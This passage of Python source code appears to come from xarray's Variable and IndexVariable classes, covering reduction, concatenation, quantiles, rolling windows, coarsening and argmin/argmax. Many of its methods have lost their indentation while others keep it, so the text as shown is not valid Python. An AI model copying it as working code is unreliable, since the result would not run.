            If True, the variable's attributes (`attrs`) will be copied from
            the original object to the new one. If False (default), the new
            object will be returned without attributes.
        keepdims : bool, default: False
            If True, the dimensions which are reduced are left in the result
            as dimensions of size one
        **kwargs : dict
            Additional keyword arguments passed on to `func`.

        Returns
        -------
        reduced : Array
            Array with summarized data and the indicated dimension(s)
            removed.
        """
        # ``dim=...`` means "all dimensions", which for this method is the
        # same as passing ``dim=None``.
        if dim == ...:
            dim = None
        if dim is not None and axis is not None:
            raise ValueError("cannot supply both 'axis' and 'dim' arguments")
        if dim is not None:
            # translate dimension name(s) to integer axis/axes for ``func``
            axis = self.get_axis_num(dim)
        with warnings.catch_warnings():
            # e.g. nanmean warns on all-NaN slices; suppress the noise here
            warnings.filterwarnings(
                "ignore", r"Mean of empty slice", category=RuntimeWarning
            )
            if axis is not None:
                data = func(self.data, axis=axis, **kwargs)
            else:
                data = func(self.data, **kwargs)
        if getattr(data, "shape", ()) == self.shape:
            # the "reduction" did not change the shape -> keep all dims
            dims = self.dims
        else:
            # normalize negative axes; ``axis is None`` means every axis
            removed_axes = (
                range(self.ndim) if axis is None else np.atleast_1d(axis) % self.ndim
            )
            if keepdims:
                # Insert np.newaxis for removed dims
                slices = tuple(
                    np.newaxis if i in removed_axes else slice(None, None)
                    for i in range(self.ndim)
                )
                if getattr(data, "shape", None) is None:
                    # Reduce has produced a scalar value, not an array-like
                    data = np.asanyarray(data)[slices]
                else:
                    data = data[slices]
                dims = self.dims
            else:
                # drop the reduced dimensions from the result's dims
                dims = [
                    adim for n, adim in enumerate(self.dims) if n not in removed_axes
                ]
        if keep_attrs is None:
            keep_attrs = _get_keep_attrs(default=False)
        attrs = self._attrs if keep_attrs else None
        return Variable(dims, data, attrs=attrs)
    @classmethod
    def concat(
        cls,
        variables,
        dim="concat_dim",
        positions=None,
        shortcut=False,
        combine_attrs="override",
    ):
        """Concatenate variables along a new or existing dimension.

        Parameters
        ----------
        variables : iterable of Variable
            Arrays to stack together. Each variable is expected to have
            matching dimensions and shape except for along the stacked
            dimension.
        dim : str or DataArray, optional
            Name of the dimension to stack along. This can either be a new
            dimension name, in which case it is added along axis=0, or an
            existing dimension name, in which case the location of the
            dimension is unchanged. Where to insert the new dimension is
            determined by the first variable.
        positions : None or list of array-like, optional
            List of integer arrays which specifies the integer positions to
            which to assign each dataset along the concatenated dimension.
            If not supplied, objects are concatenated in the provided order.
        shortcut : bool, optional
            This option is used internally to speed-up groupby operations.
            If `shortcut` is True, some checks of internal consistency between
            arrays to concatenate are skipped.
        combine_attrs : {"drop", "identical", "no_conflicts", "drop_conflicts", \
                         "override"}, default: "override"
            String indicating how to combine attrs of the objects being merged:

            - "drop": empty attrs on returned Dataset.
            - "identical": all attrs must be the same on every object.
            - "no_conflicts": attrs from all objects are combined, any that have
              the same name must also have the same value.
            - "drop_conflicts": attrs from all objects are combined, any that have
              the same name but different values are dropped.
            - "override": skip comparing and copy attrs from the first dataset to
              the result.

        Returns
        -------
        stacked : Variable
            Concatenated Variable formed by stacking all the supplied variables
            along the given dimension.
        """
        from .merge import merge_attrs

        # a 1-d DataArray may be passed as ``dim``; use its sole dimension name
        if not isinstance(dim, str):
            (dim,) = dim.dims

        # can't do this lazily: we need to loop through variables at least
        # twice
        variables = list(variables)
        first_var = variables[0]

        arrays = [v.data for v in variables]

        if dim in first_var.dims:
            # concatenating along an existing dimension
            axis = first_var.get_axis_num(dim)
            dims = first_var.dims
            data = duck_array_ops.concatenate(arrays, axis=axis)
            if positions is not None:
                # TODO: deprecate this option -- we don't need it for groupby
                # any more.
                indices = nputils.inverse_permutation(np.concatenate(positions))
                data = duck_array_ops.take(data, indices, axis=axis)
        else:
            # new dimension: stack along a fresh leading axis
            axis = 0
            dims = (dim,) + first_var.dims
            data = duck_array_ops.stack(arrays, axis=axis)

        attrs = merge_attrs(
            [var.attrs for var in variables], combine_attrs=combine_attrs
        )
        encoding = dict(first_var.encoding)
        if not shortcut:
            # sanity check: every input must share the first variable's dims
            for var in variables:
                if var.dims != first_var.dims:
                    raise ValueError(
                        f"Variable has dimensions {list(var.dims)} but first Variable has dimensions {list(first_var.dims)}"
                    )

        return cls(dims, data, attrs, encoding)
def equals(self, other, equiv=duck_array_ops.array_equiv):
"""True if two Variables have the same dimensions and values;
otherwise False.
Variables can still be equal (like pandas objects) if they have NaN
values in the same locations.
This method is necessary because `v1 == v2` for Variables
does element-wise comparisons (like numpy.ndarrays).
"""
other = getattr(other, "variable", other)
try:
return self.dims == other.dims and (
self._data is other._data or equiv(self.data, other.data)
)
except (TypeError, AttributeError):
return False
def broadcast_equals(self, other, equiv=duck_array_ops.array_equiv):
"""True if two Variables have the values after being broadcast against
each other; otherwise False.
Variables can still be equal (like pandas objects) if they have NaN
values in the same locations.
"""
try:
self, other = broadcast_variables(self, other)
except (ValueError, AttributeError):
return False
return self.equals(other, equiv=equiv)
def identical(self, other, equiv=duck_array_ops.array_equiv):
"""Like equals, but also checks attributes."""
try:
return utils.dict_equiv(self.attrs, other.attrs) and self.equals(
other, equiv=equiv
)
except (TypeError, AttributeError):
return False
def no_conflicts(self, other, equiv=duck_array_ops.array_notnull_equiv):
"""True if the intersection of two Variable's non-null data is
equal; otherwise false.
Variables can thus still be equal if there are locations where either,
or both, contain NaN values.
"""
return self.broadcast_equals(other, equiv=equiv)
    def quantile(
        self, q, dim=None, interpolation="linear", keep_attrs=None, skipna=True
    ):
        """Compute the qth quantile of the data along the specified dimension.

        Returns the qth quantiles(s) of the array elements.

        Parameters
        ----------
        q : float or sequence of float
            Quantile to compute, which must be between 0 and 1
            inclusive.
        dim : str or sequence of str, optional
            Dimension(s) over which to apply quantile.
        interpolation : {"linear", "lower", "higher", "midpoint", "nearest"}, default: "linear"
            This optional parameter specifies the interpolation method to
            use when the desired quantile lies between two data points
            ``i < j``:

            * linear: ``i + (j - i) * fraction``, where ``fraction`` is
              the fractional part of the index surrounded by ``i`` and
              ``j``.
            * lower: ``i``.
            * higher: ``j``.
            * nearest: ``i`` or ``j``, whichever is nearest.
            * midpoint: ``(i + j) / 2``.
        keep_attrs : bool, optional
            If True, the variable's attributes (`attrs`) will be copied from
            the original object to the new one. If False (default), the new
            object will be returned without attributes.
        skipna : bool, optional
            If True (default), NaN values are ignored (np.nanquantile);
            otherwise np.quantile is used.

        Returns
        -------
        quantiles : Variable
            If `q` is a single quantile, then the result
            is a scalar. If multiple percentiles are given, first axis of
            the result corresponds to the quantile and a quantile dimension
            is added to the return array. The other dimensions are the
            dimensions that remain after the reduction of the array.

        See Also
        --------
        numpy.nanquantile, pandas.Series.quantile, Dataset.quantile
        DataArray.quantile
        """
        from .computation import apply_ufunc

        # NOTE(review): the ``interpolation`` keyword was renamed ``method``
        # in newer NumPy releases -- confirm against the supported NumPy range.
        _quantile_func = np.nanquantile if skipna else np.quantile

        if keep_attrs is None:
            keep_attrs = _get_keep_attrs(default=False)

        # remember scalar-ness so a scalar ``q`` yields a scalar result below
        scalar = utils.is_scalar(q)
        q = np.atleast_1d(np.asarray(q, dtype=np.float64))

        if dim is None:
            dim = self.dims

        if utils.is_scalar(dim):
            dim = [dim]

        def _wrapper(npa, **kwargs):
            # move quantile axis to end. required for apply_ufunc
            return np.moveaxis(_quantile_func(npa, **kwargs), 0, -1)

        # the reduced core dims are moved to the end by apply_ufunc, so the
        # reduction axes are the trailing ``len(dim)`` negative axes
        axis = np.arange(-1, -1 * len(dim) - 1, -1)
        result = apply_ufunc(
            _wrapper,
            self,
            input_core_dims=[dim],
            exclude_dims=set(dim),
            output_core_dims=[["quantile"]],
            output_dtypes=[np.float64],
            dask_gufunc_kwargs=dict(output_sizes={"quantile": len(q)}),
            dask="parallelized",
            kwargs={"q": q, "axis": axis, "interpolation": interpolation},
        )

        # for backward compatibility
        result = result.transpose("quantile", ...)
        if scalar:
            result = result.squeeze("quantile")
        if keep_attrs:
            result.attrs = self._attrs
        return result
def rank(self, dim, pct=False):
"""Ranks the data.
Equal values are assigned a rank that is the average of the ranks that
would have been otherwise assigned to all of the values within that
set. Ranks begin at 1, not 0. If `pct`, computes percentage ranks.
NaNs in the input array are returned as NaNs.
The `bottleneck` library is required.
Parameters
----------
dim : str
Dimension over which to compute rank.
pct : bool, optional
If True, compute percentage ranks, otherwise compute integer ranks.
Returns
-------
ranked : Variable
See Also
--------
Dataset.rank, DataArray.rank
"""
import bottleneck as bn
data = self.data
if is_duck_dask_array(data):
raise TypeError(
"rank does not work for arrays stored as dask "
"arrays. Load the data via .compute() or .load() "
"prior to calling this method."
)
elif not isinstance(data, np.ndarray):
raise TypeError(
"rank is not implemented for {} objects.".format(type(data))
)
axis = self.get_axis_num(dim)
func = bn.nanrankdata if self.dtype.kind == "f" else bn.rankdata
ranked = func(data, axis=axis)
if pct:
count = np.sum(~np.isnan(data), axis=axis, keepdims=True)
ranked /= count
return Variable(self.dims, ranked)
    def rolling_window(
        self, dim, window, window_dim, center=False, fill_value=dtypes.NA
    ):
        """
        Make a rolling_window along dim and add a new_dim to the last place.

        Parameters
        ----------
        dim : str
            Dimension over which to compute rolling_window.
            For nd-rolling, should be list of dimensions.
        window : int
            Window size of the rolling
            For nd-rolling, should be list of integers.
        window_dim : str
            New name of the window dimension.
            For nd-rolling, should be list of strings.
        center : bool, default: False
            If True, pad fill_value for both ends. Otherwise, pad in the head
            of the axis.
        fill_value
            value to be filled.

        Returns
        -------
        Variable that is a view of the original array with a added dimension of
        size w.
        The return dim: self.dims + (window_dim, )
        The return shape: self.shape + (window, )

        Examples
        --------
        >>> v = Variable(("a", "b"), np.arange(8).reshape((2, 4)))
        >>> v.rolling_window("b", 3, "window_dim")
        <xarray.Variable (a: 2, b: 4, window_dim: 3)>
        array([[[nan, nan,  0.],
                [nan,  0.,  1.],
                [ 0.,  1.,  2.],
                [ 1.,  2.,  3.]],
        <BLANKLINE>
               [[nan, nan,  4.],
                [nan,  4.,  5.],
                [ 4.,  5.,  6.],
                [ 5.,  6.,  7.]]])

        >>> v.rolling_window("b", 3, "window_dim", center=True)
        <xarray.Variable (a: 2, b: 4, window_dim: 3)>
        array([[[nan,  0.,  1.],
                [ 0.,  1.,  2.],
                [ 1.,  2.,  3.],
                [ 2.,  3., nan]],
        <BLANKLINE>
               [[nan,  4.,  5.],
                [ 4.,  5.,  6.],
                [ 5.,  6.,  7.],
                [ 6.,  7., nan]]])
        """
        if fill_value is dtypes.NA:  # np.nan is passed
            # promote so the fill value (e.g. NaN) is representable
            dtype, fill_value = dtypes.maybe_promote(self.dtype)
            var = self.astype(dtype, copy=False)
        else:
            dtype = self.dtype
            var = self

        if utils.is_scalar(dim):
            # scalar ``dim`` requires every companion argument to be scalar too
            for name, arg in zip(
                ["window", "window_dim", "center"], [window, window_dim, center]
            ):
                if not utils.is_scalar(arg):
                    raise ValueError(
                        f"Expected {name}={arg!r} to be a scalar like 'dim'."
                    )
            dim = [dim]

        # dim is now a list
        nroll = len(dim)
        # broadcast scalar window/window_dim/center to one entry per dimension
        if utils.is_scalar(window):
            window = [window] * nroll
        if utils.is_scalar(window_dim):
            window_dim = [window_dim] * nroll
        if utils.is_scalar(center):
            center = [center] * nroll
        if (
            len(dim) != len(window)
            or len(dim) != len(window_dim)
            or len(dim) != len(center)
        ):
            raise ValueError(
                "'dim', 'window', 'window_dim', and 'center' must be the same length. "
                f"Received dim={dim!r}, window={window!r}, window_dim={window_dim!r},"
                f" and center={center!r}."
            )

        # pad each rolled dimension so the sliding window covers the edges
        pads = {}
        for d, win, cent in zip(dim, window, center):
            if cent:
                start = win // 2  # 10 -> 5, 9 -> 4
                end = win - 1 - start
                pads[d] = (start, end)
            else:
                pads[d] = (win - 1, 0)

        padded = var.pad(pads, mode="constant", constant_values=fill_value)
        axis = [self.get_axis_num(d) for d in dim]
        new_dims = self.dims + tuple(window_dim)
        return Variable(
            new_dims,
            duck_array_ops.sliding_window_view(
                padded.data, window_shape=window, axis=axis
            ),
        )
def coarsen(
self, windows, func, boundary="exact", side="left", keep_attrs=None, **kwargs
):
"""
Apply reduction function.
"""
windows = {k: v for k, v in windows.items() if k in self.dims}
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=True)
if keep_attrs:
_attrs = self.attrs
else:
_attrs = None
if not windows:
return self._replace(attrs=_attrs)
reshaped, axes = self.coarsen_reshape(windows, boundary, side)
if isinstance(func, str):
name = func
func = getattr(duck_array_ops, name, None)
if func is None:
raise NameError(f"{name} is not a valid method.")
return self._replace(data=func(reshaped, axis=axes, **kwargs), attrs=_attrs)
    def coarsen_reshape(self, windows, boundary, side):
        """
        Construct a reshaped-array for coarsen

        Returns the reshaped ndarray together with the tuple of axes (into the
        reshaped array) over which the coarsening reduction should be applied.
        """
        # allow scalar boundary/side to apply to every coarsened dimension
        if not utils.is_dict_like(boundary):
            boundary = {d: boundary for d in windows.keys()}

        if not utils.is_dict_like(side):
            side = {d: side for d in windows.keys()}

        # remove unrelated dimensions
        boundary = {k: v for k, v in boundary.items() if k in windows}
        side = {k: v for k, v in side.items() if k in windows}

        for d, window in windows.items():
            if window <= 0:
                raise ValueError(
                    f"window must be > 0. Given {window} for dimension {d}"
                )

        variable = self
        for d, window in windows.items():
            # trim or pad the object
            size = variable.shape[self._get_axis_num(d)]
            n = int(size / window)
            if boundary[d] == "exact":
                # size must divide evenly by the window
                if n * window != size:
                    raise ValueError(
                        f"Could not coarsen a dimension of size {size} with "
                        f"window {window} and boundary='exact'. Try a different 'boundary' option."
                    )
            elif boundary[d] == "trim":
                # drop the excess from the chosen side
                if side[d] == "left":
                    variable = variable.isel({d: slice(0, window * n)})
                else:
                    excess = size - window * n
                    variable = variable.isel({d: slice(excess, None)})
            elif boundary[d] == "pad":  # pad
                # pad up to the next multiple of the window
                pad = window * n - size
                if pad < 0:
                    pad += window
                if side[d] == "left":
                    pad_width = {d: (0, pad)}
                else:
                    pad_width = {d: (pad, 0)}
                variable = variable.pad(pad_width, mode="constant")
            else:
                raise TypeError(
                    "{} is invalid for boundary. Valid option is 'exact', "
                    "'trim' and 'pad'".format(boundary[d])
                )

        # Split every coarsened axis i into (n_blocks, window); ``axes`` holds
        # the positions of the window axes in the reshaped array.
        shape = []
        axes = []
        axis_count = 0
        for i, d in enumerate(variable.dims):
            if d in windows:
                size = variable.shape[i]
                shape.append(int(size / windows[d]))
                shape.append(windows[d])
                axis_count += 1
                axes.append(i + axis_count)
            else:
                shape.append(variable.shape[i])

        return variable.data.reshape(shape), tuple(axes)
def isnull(self, keep_attrs: bool = None):
"""Test each value in the array for whether it is a missing value.
Returns
-------
isnull : Variable
Same type and shape as object, but the dtype of the data is bool.
See Also
--------
pandas.isnull
Examples
--------
>>> var = xr.Variable("x", [1, np.nan, 3])
>>> var
<xarray.Variable (x: 3)>
array([ 1., nan, 3.])
>>> var.isnull()
<xarray.Variable (x: 3)>
array([False, True, False])
"""
from .computation import apply_ufunc
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
return apply_ufunc(
duck_array_ops.isnull,
self,
dask="allowed",
keep_attrs=keep_attrs,
)
def notnull(self, keep_attrs: bool = None):
"""Test each value in the array for whether it is not a missing value.
Returns
-------
notnull : Variable
Same type and shape as object, but the dtype of the data is bool.
See Also
--------
pandas.notnull
Examples
--------
>>> var = xr.Variable("x", [1, np.nan, 3])
>>> var
<xarray.Variable (x: 3)>
array([ 1., nan, 3.])
>>> var.notnull()
<xarray.Variable (x: 3)>
array([ True, False, True])
"""
from .computation import apply_ufunc
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
return apply_ufunc(
duck_array_ops.notnull,
self,
dask="allowed",
keep_attrs=keep_attrs,
)
@property
def real(self):
return self._replace(data=self.data.real)
@property
def imag(self):
return self._replace(data=self.data.imag)
def __array_wrap__(self, obj, context=None):
return Variable(self.dims, obj)
def _unary_op(self, f, *args, **kwargs):
keep_attrs = kwargs.pop("keep_attrs", None)
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=True)
with np.errstate(all="ignore"):
result = self.__array_wrap__(f(self.data, *args, **kwargs))
if keep_attrs:
result.attrs = self.attrs
return result
def _binary_op(self, other, f, reflexive=False):
if isinstance(other, (xr.DataArray, xr.Dataset)):
return NotImplemented
if reflexive and issubclass(type(self), type(other)):
other_data, self_data, dims = _broadcast_compat_data(other, self)
else:
self_data, other_data, dims = _broadcast_compat_data(self, other)
keep_attrs = _get_keep_attrs(default=False)
attrs = self._attrs if keep_attrs else None
with np.errstate(all="ignore"):
new_data = (
f(self_data, other_data) if not reflexive else f(other_data, self_data)
)
result = Variable(dims, new_data, attrs=attrs)
return result
def _inplace_binary_op(self, other, f):
if isinstance(other, xr.Dataset):
raise TypeError("cannot add a Dataset to a Variable in-place")
self_data, other_data, dims = _broadcast_compat_data(self, other)
if dims != self.dims:
raise ValueError("dimensions cannot change for in-place operations")
with np.errstate(all="ignore"):
self.values = f(self_data, other_data)
return self
def _to_numeric(self, offset=None, datetime_unit=None, dtype=float):
"""A (private) method to convert datetime array to numeric dtype
See duck_array_ops.datetime_to_numeric
"""
numeric_array = duck_array_ops.datetime_to_numeric(
self.data, offset, datetime_unit, dtype
)
return type(self)(self.dims, numeric_array, self._attrs)
    def _unravel_argminmax(
        self,
        argminmax: str,
        dim: Union[Hashable, Sequence[Hashable], None],
        axis: Union[int, None],
        keep_attrs: Optional[bool],
        skipna: Optional[bool],
    ) -> Union["Variable", Dict[Hashable, "Variable"]]:
        """Apply argmin or argmax over one or more dimensions, returning the result as a
        dict of DataArray that can be passed directly to isel.
        """
        if dim is None and axis is None:
            warnings.warn(
                "Behaviour of argmin/argmax with neither dim nor axis argument will "
                "change to return a dict of indices of each dimension. To get a "
                "single, flat index, please use np.argmin(da.data) or "
                "np.argmax(da.data) instead of da.argmin() or da.argmax().",
                DeprecationWarning,
                stacklevel=3,
            )

        argminmax_func = getattr(duck_array_ops, argminmax)

        if dim is ...:
            # In future, should do this also when (dim is None and axis is None)
            dim = self.dims
        if (
            dim is None
            or axis is not None
            or not isinstance(dim, Sequence)
            or isinstance(dim, str)
        ):
            # Return int index if single dimension is passed, and is not part of a
            # sequence
            return self.reduce(
                argminmax_func, dim=dim, axis=axis, keep_attrs=keep_attrs, skipna=skipna
            )

        # Get a name for the new dimension that does not conflict with any existing
        # dimension
        newdimname = "_unravel_argminmax_dim_0"
        count = 1
        while newdimname in self.dims:
            newdimname = f"_unravel_argminmax_dim_{count}"
            count += 1

        # Collapse the requested dims into one stacked dim, take argmin/argmax
        # of the flat indices along it, then unravel back to per-dim indices.
        stacked = self.stack({newdimname: dim})

        result_dims = stacked.dims[:-1]
        reduce_shape = tuple(self.sizes[d] for d in dim)

        result_flat_indices = stacked.reduce(argminmax_func, axis=-1, skipna=skipna)

        result_unravelled_indices = duck_array_ops.unravel_index(
            result_flat_indices.data, reduce_shape
        )

        result = {
            d: Variable(dims=result_dims, data=i)
            for d, i in zip(dim, result_unravelled_indices)
        }

        if keep_attrs is None:
            keep_attrs = _get_keep_attrs(default=False)
        if keep_attrs:
            for v in result.values():
                v.attrs = self.attrs

        return result
def argmin(
self,
dim: Union[Hashable, Sequence[Hashable]] = None,
axis: int = None,
keep_attrs: bool = None,
skipna: bool = None,
) -> Union["Variable", Dict[Hashable, "Variable"]]:
"""Index or indices of the minimum of the Variable over one or more dimensions.
If a sequence is passed to 'dim', then result returned as dict of Variables,
which can be passed directly to isel(). If a single str is passed to 'dim' then
returns a Variable with dtype int.
If there are multiple minima, the indices of the first one found will be
returned.
Parameters
----------
dim : hashable, sequence of hashable or ..., optional
The dimensions over which to find the minimum. By default, finds minimum over
all dimensions - for now returning an int for backward compatibility, but
this is deprecated, in future will return a dict with indices for all
dimensions; to return a dict with all dimensions now, pass '...'.
axis : int, optional
Axis over which to apply `argmin`. Only one of the 'dim' and 'axis' arguments
can be supplied.
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
Returns
-------
result : Variable or dict of Variable
See Also
--------
DataArray.argmin, DataArray.idxmin
"""
return self._unravel_argminmax("argmin", dim, axis, keep_attrs, skipna)
def argmax(
self,
dim: Union[Hashable, Sequence[Hashable]] = None,
axis: int = None,
keep_attrs: bool = None,
skipna: bool = None,
) -> Union["Variable", Dict[Hashable, "Variable"]]:
"""Index or indices of the maximum of the Variable over one or more dimensions.
If a sequence is passed to 'dim', then result returned as dict of Variables,
which can be passed directly to isel(). If a single str is passed to 'dim' then
returns a Variable with dtype int.
If there are multiple maxima, the indices of the first one found will be
returned.
Parameters
----------
dim : hashable, sequence of hashable or ..., optional
The dimensions over which to find the maximum. By default, finds maximum over
all dimensions - for now returning an int for backward compatibility, but
this is deprecated, in future will return a dict with indices for all
dimensions; to return a dict with all dimensions now, pass '...'.
axis : int, optional
Axis over which to apply `argmin`. Only one of the 'dim' and 'axis' arguments
can be supplied.
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
Returns
-------
result : Variable or dict of Variable
See Also
--------
DataArray.argmax, DataArray.idxmax
"""
return self._unravel_argminmax("argmax", dim, axis, keep_attrs, skipna)
class IndexVariable(Variable):
    """Wrapper for accommodating a pandas.Index in an xarray.Variable.

    IndexVariable preserve loaded values in the form of a pandas.Index instead
    of a NumPy array. Hence, their values are immutable and must always be one-
    dimensional.

    They also have a name property, which is the name of their sole dimension
    unless another name is given.
    """

    __slots__ = ()

    def __init__(self, dims, data, attrs=None, encoding=None, fastpath=False):
        # Validate 1-dimensionality and wrap the data in a PandasIndex adapter.
        super().__init__(dims, data, attrs, encoding, fastpath)
        if self.ndim != 1:
            raise ValueError(f"{type(self).__name__} objects must be 1-dimensional")

        # Unlike in Variable, always eagerly load values into memory
        if not isinstance(self._data, PandasIndex):
            self._data = PandasIndex(self._data)

    def __dask_tokenize__(self):
        from dask.base import normalize_token

        # Don't waste time converting pd.Index to np.ndarray
        return normalize_token((type(self), self._dims, self._data.array, self._attrs))

    def load(self):
        # data is already loaded into memory for IndexVariable
        return self

    # https://github.com/python/mypy/issues/1465
    @Variable.data.setter  # type: ignore[attr-defined]
    def data(self, data):
        # IndexVariable data is immutable; direct assignment is disallowed.
        raise ValueError(
            f"Cannot assign to the .data attribute of dimension coordinate a.k.a IndexVariable {self.name!r}. "
            f"Please use DataArray.assign_coords, Dataset.assign_coords or Dataset.assign as appropriate."
        )

    @Variable.values.setter  # type: ignore[attr-defined]
    def values(self, values):
        # IndexVariable values are immutable; direct assignment is disallowed.
        raise ValueError(
            f"Cannot assign to the .values attribute of dimension coordinate a.k.a IndexVariable {self.name!r}. "
            f"Please use DataArray.assign_coords, Dataset.assign_coords or Dataset.assign as appropriate."
        )

    def chunk(self, chunks={}, name=None, lock=False):
        # Dummy - do not chunk. This method is invoked e.g. by Dataset.chunk()
        return self.copy(deep=False)

    def _as_sparse(self, sparse_format=_default, fill_value=_default):
        # Dummy
        return self.copy(deep=False)

    def _to_dense(self):
        # Dummy
        return self.copy(deep=False)

    def _finalize_indexing_result(self, dims, data):
        if getattr(data, "ndim", 0) != 1:
            # returns Variable rather than IndexVariable if multi-dimensional
            return Variable(dims, data, self._attrs, self._encoding)
        else:
            return self._replace(dims=dims, data=data)

    def __setitem__(self, key, value):
        # item assignment would mutate the pandas.Index; forbid it
        raise TypeError(f"{type(self).__name__} values cannot be modified")

    @classmethod
    def concat(
        cls,
        variables,
        dim="concat_dim",
        positions=None,
        shortcut=False,
        combine_attrs="override",
    ):
        """Specialized version of Variable.concat for IndexVariable objects.

        This exists because we want to avoid converting Index objects to NumPy
        arrays, if possible.
        """
        from .merge import merge_attrs

        # a 1-d DataArray may be passed as ``dim``; use its sole dimension name
        if not isinstance(dim, str):
            (dim,) = dim.dims

        variables = list(variables)
        first_var = variables[0]

        if any(not isinstance(v, cls) for v in variables):
            raise TypeError(
                "IndexVariable.concat requires that all input "
                "variables be IndexVariable objects"
            )

        indexes = [v._data.array for v in variables]

        if not indexes:
            data = []
        else:
            # pandas.Index.append keeps the data as an Index (no ndarray copy)
            data = indexes[0].append(indexes[1:])

            if positions is not None:
                indices = nputils.inverse_permutation(np.concatenate(positions))
                data = data.take(indices)

        # keep as str if possible as pandas.Index uses object (converts to numpy array)
        data = maybe_coerce_to_str(data, variables)

        attrs = merge_attrs(
            [var.attrs for var in variables], combine_attrs=combine_attrs
        )
        if not shortcut:
            for var in variables:
                if var.dims != first_var.dims:
                    raise ValueError("inconsistent dimensions")

        return cls(first_var.dims, data, attrs)

    def copy(self, deep=True, data=None):
        """Returns a copy of this object.

        `deep` is ignored since data is stored in the form of
        pandas.Index, which is already immutable. Dimensions, attributes
        and encodings are always copied.

        Use `data` to create a new object with the same structure as
        original but entirely new data.

        Parameters
        ----------
        deep : bool, optional
            Deep is ignored when data is given. Whether the data array is
            loaded into memory and copied onto the new object. Default is True.
        data : array_like, optional
            Data to use in the new object. Must have same shape as original.

        Returns
        -------
        object : Variable
            New object with dimensions, attributes, encodings, and optionally
            data copied from original.
        """
        if data is None:
            data = self._data.copy(deep=deep)
        else:
            data = as_compatible_data(data)
            if self.shape != data.shape:
                raise ValueError(
                    "Data shape {} must match shape of object {}".format(
                        data.shape, self.shape
                    )
                )
        return self._replace(data=data)

    def equals(self, other, equiv=None):
        # if equiv is specified, super up
        if equiv is not None:
            return super().equals(other, equiv)

        # otherwise use the native index equals, rather than looking at _data
        other = getattr(other, "variable", other)
        try:
            return self.dims == other.dims and self._data_equals(other)
        except (TypeError, AttributeError):
            return False

    def _data_equals(self, other):
        # compare via pandas.Index.equals (null-aware, dtype-tolerant)
        return self.to_index().equals(other.to_index())

    def to_index_variable(self):
        """Return this variable as an xarray.IndexVariable"""
        return self

    # NOTE(review): ``utils.alias`` appears to wrap the target with a
    # deprecation notice when called under the old name -- confirm in utils.
    to_coord = utils.alias(to_index_variable, "to_coord")

    def to_index(self):
        """Convert this variable to a pandas.Index"""
        # n.b. creating a new pandas.Index from an old pandas.Index is
        # basically free as pandas.Index objects are immutable
        assert self.ndim == 1
        index = self._data.array
        if isinstance(index, pd.MultiIndex):
            # set default names for multi-index unnamed levels so that
            # we can safely rename dimension / coordinate later
            valid_level_names = [
                name or "{}_level_{}".format(self.dims[0], i)
                for i, name in enumerate(index.names)
            ]
            index = index.set_names(valid_level_names)
        else:
            index = index.set_names(self.name)
        return index

    @property
    def level_names(self):
        """Return MultiIndex level names or None if this IndexVariable has no
        MultiIndex.
        """
        index = self.to_index()
        if isinstance(index, pd.MultiIndex):
            return index.names
        else:
            return None

    def get_level_variable(self, level):
        """Return a new IndexVariable from a given MultiIndex level."""
        if self.level_names is None:
            raise ValueError(f"IndexVariable {self.name!r} has no MultiIndex")
        index = self.to_index()
        return type(self)(self.dims, index.get_level_values(level))

    @property
    def name(self):
        # the name of an IndexVariable is the name of its single dimension
        return self.dims[0]

    @name.setter
    def name(self, value):
        raise AttributeError("cannot modify name of IndexVariable in-place")
# for backwards compatibility
# ``Coordinate`` is a legacy alias of ``IndexVariable`` created via
# ``utils.alias`` (which appears to flag usage under the old name -- see utils).
Coordinate = utils.alias(IndexVariable, "Coordinate")
def _unified_dims(variables):
# validate dimensions
all_dims = {}
for var in variables:
var_dims = var.dims
if len(set(var_dims)) < len(var_dims):
raise ValueError(
"broadcasting cannot handle duplicate "
f"dimensions: {list(var_dims)!r}"
)
for d, s in zip(var_dims, var.shape):
if d not in all_dims:
all_dims[d] = s
elif all_dims[d] != s:
raise ValueError(
"operands cannot be broadcast together "
f"with mismatched lengths for dimension {d!r}: {(all_dims[d], s)}"
)
return all_dims
def _broadcast_compat_variables(*variables):
    """Create broadcast compatible variables, with the same dimensions.

    Unlike the result of broadcast_variables(), some variables may have
    dimensions of size 1 instead of the size of the broadcast dimension.
    """
    target_dims = tuple(_unified_dims(variables))
    return tuple(
        var if var.dims == target_dims else var.set_dims(target_dims)
        for var in variables
    )
def broadcast_variables(*variables):
    """Given any number of variables, return variables with matching dimensions
    and broadcast data.

    The data on the returned variables will be a view of the data on the
    corresponding original arrays, but dimensions will be reordered and
    inserted so that both broadcast arrays have the same dimensions. The new
    dimensions are sorted in order of appearance in the first variable's
    dimensions followed by the second variable's dimensions.
    """
    dims_map = _unified_dims(variables)
    dims_tuple = tuple(dims_map)
    broadcast = []
    for var in variables:
        if var.dims == dims_tuple:
            broadcast.append(var)
        else:
            # set_dims expands/reorders to the full broadcast dimensions
            broadcast.append(var.set_dims(dims_map))
    return tuple(broadcast)
def _broadcast_compat_data(self, other):
    """Return (self_data, other_data, dims) made compatible for binary ops."""
    required_attrs = ("dims", "data", "shape", "encoding")
    if not all(hasattr(other, attr) for attr in required_attrs):
        # `other` is a bare array/scalar; rely on numpy broadcasting rules
        return self.data, other, self.dims
    # `other` satisfies the necessary Variable API for broadcast_variables
    new_self, new_other = _broadcast_compat_variables(self, other)
    return new_self.data, new_other.data, new_self.dims
def concat(
    variables,
    dim="concat_dim",
    positions=None,
    shortcut=False,
    combine_attrs="override",
):
    """Concatenate variables along a new or existing dimension.

    Parameters
    ----------
    variables : iterable of Variable
        Arrays to stack together; each is expected to have matching
        dimensions and shape except along the stacked dimension.
    dim : str or DataArray, optional
        Dimension to stack along.  A new name is inserted along axis=0; an
        existing name keeps its current axis position (as determined by the
        first variable).
    positions : None or list of array-like, optional
        Integer positions to which each dataset is assigned along the
